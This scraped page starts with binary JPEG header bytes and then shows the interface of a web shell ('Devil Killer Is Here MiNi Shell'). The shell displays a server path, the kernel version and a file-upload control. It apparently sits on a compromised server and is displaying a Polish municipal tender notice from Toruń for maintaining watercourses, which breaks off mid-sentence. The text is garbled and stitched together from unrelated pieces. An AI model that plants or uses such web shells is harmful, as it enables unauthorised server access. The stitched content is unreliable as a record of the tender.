JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211213/0031215201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bieżące utrzymanie cieków wodnych i urządzeń odwadniających na terenie miasta Torunia. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasta Toruń</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118856</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wały Gen. Sikorskiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Toruń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bom@um.torun.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.torun.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące utrzymanie cieków wodnych i urządzeń odwadniających na terenie miasta Torunia. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b3cc44ed-5763-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00312152</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000805/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.18 Bieżące utrzymanie cieków wodnych i urządzeń odwadniających na terenie miasta Torunia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.umtorun.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umtorun.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu Platformy https://umtorun.ezamawiajacy.pl, oraz poczty elektronicznej.2. Zamawiający<br/>wyznacza następujące osoby do kontaktu z Wykonawcami: - w zakresie formalno-prawnym:<br/>PanJanusz Majewski e-mail: j.majewski@um.torun.pl - w zakresie merytorycznym: J.Czerwiński e<br/>mail: j.czerwinski@um.torun.pl Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do<br/>Systemu na stronie internetowej Urzędu Miasta Torunia: https://umtorun.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie<br/>przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości<br/>zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu<br/>rejestracyjnego: podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z<br/>obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 3. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji dla<br/>Wykonawców – Regulacje i procedury procesu zakupowego https://umtorun.ezamawiajacy.pl.4.<br/>Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w<br/>formatach: pdf., xls., doc., zip. Wykonawca może złożyć jednorazowo maks. 15 plików.5. Za datę<br/>przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>wczytania do Platformy https://umtorun.ezamawiajacy.pl.6. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem Platformy Zamawiający w zakładce &#34;Pytania i odpowiedzi&#34;. Za datę<br/>przekazania zawiadomień oraz informacji przyjmuje się ich datę wczytania do Systemu. 7. Dokumenty<br/>Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza<br/>również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń za pomocą poczty elektronicznej. 8. Złożenie oferty: Oferta wraz z<br/>załącznikami musi zostać sporządzona w języku polskim i złożona w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem osobistym lub podpisem zaufanym pod rygorem<br/>nieważności 9. Szczegółowe informacje dot. wymagań technicznych i organizacyjnych zawarte są w pkt 16.1 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Zgodnie z art. 13 ust.1 i 2<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: a) administratorem<br/>Pani/Pana danych osobowych jest Gmina Miasta Toruń, ul. Wały gen. Sikorskiego 8, 87-100 Toruń b)<br/>inspektorem ochrony danych osobowych zamawiającego jest Pan Marcin Kapiwąs, tel. 56 611 8802,<br/>email:<br/>iod@um.torun.pl;c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z niniejszego postępowaniem o udzielenie zamówienia publicznego<br/>prowadzonym w trybie przetargu nieograniczonego; d) odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>oraz art. 74 ustawy z dnia 11 września 20219 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz.<br/>2019 ze zm.), dalej„ustawa Pzp”;e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78<br/>ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy; f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp ; g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania): Informuję, że: 1.<br/>Posiada Pani/Pan:- na podstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;- na podstawie art. 16 RODOprawo do sprostowania Pani/Pana danych osobowych;- na<br/>podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;- prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczącychnarusza przepisy RODO;2. Nie przysługuje Pani/Panu:- związku z<br/>art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia<br/>danych osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">89/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Bieżące utrzymanie cieków wodnych i urządzeń odwadniających na terenie miasta Torunia”.<br/>1.2. Zakres rzeczowy zadania, uwzględniający także czynności interwencyjne polega na:<br/>1) mechanicznym lub ręcznym wykoszeniu roślinności z korony, skarp oraz dna rowów i cieków<br/>z wygrabieniem i wywozem pokosu,<br/>2) usuwaniu kożucha roślin pływających,<br/>3) oczyszczaniu linii brzegowej zbiorników i stawów,<br/>4) oczyszczaniu korony, skarp oraz dna rowów i cieków z odpadów,<br/>5) karczowaniu drzew i krzewów ze skarp oraz dna rowów,<br/>6) usuwaniu przetamowań i zatorów z koryt rowów i cieków,<br/>7) mechanicznym i ręcznym odmuleniu dna rowów z wywozem urobku z odmulenia na<br/>składowisko odpadów,<br/>8) mechanicznym i ręcznym plantowaniu,<br/>9) hakowaniu dna koryt rowów,<br/>10) czyszczeniu krat, zbieraczy i przepustów z odpadów i osadów,<br/>11) usuwaniu zatorów lodowych na kratach i przepustach,<br/>12) kontroli stanu i nadzorze nad sprzętem ratunkowym na prawym brzegu rz. Wisły (Bulwar<br/>Filadelfijski)<br/>13) obsłudze jazu rozdzielczego Strugi Toruńskiej,<br/>14) wykonywaniu czynności zabezpieczających w korytach rowów i cieków w czasie powodzi<br/>oraz zdarzeń losowych, w celu usunięcia zagrożenia i przywrócenia ich funkcji,<br/>15) humusowaniu i obsiewie uszkodzonych fragmentów skarp rowów i zbiorników,<br/>16) palikowaniu, faszynowaniu, naprawie skarp uszkodzonych fragmentów koryt rowów.<br/>1.3.Czynności wskazane w ust. 1 pkt 1 - 13 należą do czynności podstawowych wykonywanych<br/>w ramach prac podstawowych.<br/>Czynności wskazane w ust. 1 pkt 14-16 należą do czynności interwencyjnych wykonywanych w<br/>ramach prac interwencyjnych.<br/>Realizacja zadania prowadzona będzie w oparciu o harmonogram prac i uzgodnienia<br/>miesięczne z Biurem Ogrodnika Miejskiego.<br/>1.4. Do obowiązków Wykonawcy należy również wykonanie prac o charakterze interwencyjnym<br/>w zakresie przewidzianym powyżej, niezależnie od przyjętego harmonogramu, dnia tygodnia i<br/>godzin pracy Wykonawcy, będących następstwem działania ludzi lub siły wyższej, mogących<br/>powodować zagrożenie dla środowiska, bezpieczeństwa ludzi lub mogących skutkować<br/>powstaniem znacznej szkody materialnej.<br/>1.5. Prace o charakterze interwencyjnym Wykonawca zobowiązuje się wykonać natychmiast po<br/>zgłoszeniu przekazanym przez Biuro Ogrodnika Miejskiego pod wyznaczony przez Wykonawcę<br/>numer telefonu dyżurnego.<br/>2. Zamawiający nie dopuszcza możliwości składania ofert częściowych.<br/>Podział zamówienia na części - Zamawiający nie przewiduje podziału zamówienia na części.<br/>Powody niedokonania podziału: realizacja zadania stanowi funkcjonalną całość i nie ma<br/>uzasadnienia dzielenia zadania na części.<br/>Zamawiający nie dopuszcza możliwości składania ofert wariantowych.3. Katalogi elektroniczne<br/>Zamawiający nie wymaga złożenia ofert w postaci katalogów elektronicznych.<br/>4.Zamówienia, o których mowa w art. 214 ust. 1 pkt 7 ustawy<br/>Zamawiający nie przewiduje udzielania zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>5. Wymagania w zakresie zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie<br/>stosunku pracy.<br/>Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub<br/>podwykonawcę, przez cały okres realizacji przedmiotu zamówienia, osób wykonujących<br/>wskazane poniżej czynności związane z pracami podstawowymi w trakcie realizacji przedmiotu<br/>zamówienia, w tym czynności fizyczne i obsługa maszyn związane z koszeniem, hakowaniem,<br/>odmulaniem ręcznym koryt rowów, obsługą mechanicznego sprzętu ogrodniczego, sprzątaniem<br/>terenu; których wykonywanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1<br/>ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (tekst jedn. Dz. U. z 2019 r. poz. 1040).<br/>Szczegóły dotyczące wymagań zatrudnienia na podstawie stosunku pracy zawarte zostały we<br/>wzorze umowy, stanowiącym załącznik do SWZ.<br/>6.Rozwiązania równoważne<br/>1) Wszędzie tam, gdzie przedmiot zamówienia został opisany poprzez wskazanie znaków<br/>towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu lub norm,<br/>europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji<br/>technicznych, Zamawiający dopuszcza oferowanie przez Wykonawcę materiałów lub rozwiązań<br/>równoważnych w stosunku do opisanych w dokumentacji, pod warunkiem, że nie obniżą<br/>określonych w dokumentacji standardów, będą posiadały wymagane odpowiednie atesty,<br/>certyfikaty lub dopuszczenia oraz zapewnią wykonanie zamówienia zgodnie z oczekiwaniami i<br/>wymaganiami Zamawiającego określonymi w SIWZ. Wskazanie w dokumentacji technicznej<br/>przykładowych znaków towarowych patentów lub pochodzenia, norm, europejskich ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych ma na celu<br/>doprecyzowanie oczekiwań Zamawiającego w stosunku do przedmiotu zamówienia i stanowi<br/>wyłącznie wzorzec jakościowy przedmiotu zamówienia. W takiej sytuacji Zamawiający wymaga<br/>od Wykonawcy stosownie do treści art. 101 ust. 5 Prawa zamówień publicznych złożenia<br/>stosownych dokumentów uwiarygodniających zastosowanie rozwiązań równoważnych. W<br/>przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o zastosowaniu innych<br/>równoważnych materiałów lub urządzeń lub rozwiązań, to rozumie się przez to, że do kalkulacji<br/>ceny oferty i wykonania przedmiotu zamówienia ujęto materiały i urządzenia zaproponowane w<br/>dokumentacji technicznej; w związku z tym Wykonawca jest zobowiązany zastosować do<br/>wykonania zamówienia materiały lub urządzenia lub rozwiązania zaproponowane w<br/>dokumentacji technicznej.<br/>2) W przypadku, gdy Wykonawca zaproponuje rozwiązania równoważne, w tym materiały,<br/>urządzenia i inne elementy, zobowiązany jest wykonać i załączyć do oferty zestawienie<br/>wszystkich zaproponowanych rozwiązań równoważnych (np. materiałów, urządzeń oraz innych<br/>elementów równoważnych) i wykazać ich równoważność w stosunku do rozwiązań (np.<br/>materiału, urządzenia i innego elementu) opisanych w dokumentacji technicznej, ze wskazaniem<br/>nazwy, strony i pozycji w dokumentacji technicznej, których dotyczy.<br/>Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że<br/>oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W<br/>takim przypadku, wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z jego<br/>opisem lub normami. Opis musi być na tyle szczegółowy, żeby Zamawiający przy ocenie ofert<br/>mógł ocenić spełnienie wymagań dotyczących ich właściwości funkcjonalnych, jakościowych iże na Wykonawcy spoczywa obowiązek wykazania, że oferowane przez niego rozwiązania (np.<br/>materiały, urządzenia i inne elementy) są równoważne w stosunku do opisanych przez<br/>Zamawiającego. Wszystkie znaki towarowe, patenty lub świadectw pochodzenia, źródła lub<br/>szczególnego procesu a także normy, europejskie oceny techniczne, aprobaty, specyfikacje<br/>techniczne i systemy referencji technicznych wskazane w dokumentacji technicznej należy<br/>traktować wyłącznie jako przykładowe a Zamawiający dopuszcza zastosowanie materiałów,<br/>urządzeń równoważnych, tj. o parametrach funkcjonalnych nie gorszych niż wskazane przez<br/>Zamawiającego. Wszystkie przewidziane w dokumentacji przetargowej parametry i wymogi<br/>techniczne przykładowych materiałów, urządzeń są parametrami minimalnymi chyba, że zapis<br/>mówi inaczej.<br/>3) Do wszystkich znaków towarowych, patentów lub świadectw pochodzenia, źródła lub<br/>szczególnego procesu a także norm, europejskich ocen technicznych, aprobat, specyfikacji<br/>technicznych i systemów referencji technicznych wskazanych w dokumentacji projektowej<br/>dopisuje się wyrazy &#34;lub równoważne&#34;.<br/>4) Kryteria równoważności wskazane zostały w załączniku do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50760000-0 - Usługi napraw i konserwacji obiektów użyteczności społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90721800-5 - Usługi ochrony przed naturalnym ryzykiem lub zagrożeniami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany czas reakcji na zgłoszenie Zamawiającego w przypadku konieczności podjęcia działań interwencyjnych (np.: usuwanie zatorów, usuwanie awarii, zabezpieczenie urządzeń w czasie powodzi)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym – zamawiający nie stawia<br/>szczegółowego warunku w tym zakresie<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów – nie dotyczy<br/>3) sytuacji ekonomicznej lub finansowej - zamawiający nie stawia szczegółowego warunku w<br/>tym zakresie<br/>4) zdolności technicznej lub zawodowej:<br/>wykonawca wykaże, że zrealizował w ciągu ostatnich 3 lat przed upływem terminu składania<br/>ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), w sposób należyty co<br/>najmniej: jedną usługę polegającą na utrzymaniu cieków wodnych i urządzeń odwadniających o<br/>wartości min.40.000,00zł brutto.<br/>Wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym oraz osobami<br/>zdolnymi do wykonania zamówienia :<br/>dysponuje co najmniej 3 osobami zdolnymi do wykonania zamówienia w tym<br/>- 1 osoba kierująca wykonaniem usługi, która powinna posiadać wykształcenie kierunkowe (w<br/>specjalności hydrotechnicznej lub wodno- melioracyjnej) lub 3 lata doświadczenia w kierowaniu<br/>pracami polegającymi na utrzymaniu cieków wodnych i urządzeń odwadniających . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa<br/>wart.125ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania, wskazanych w art. 108<br/>ust.1ustawy –załącznik nr 4. W przypadku 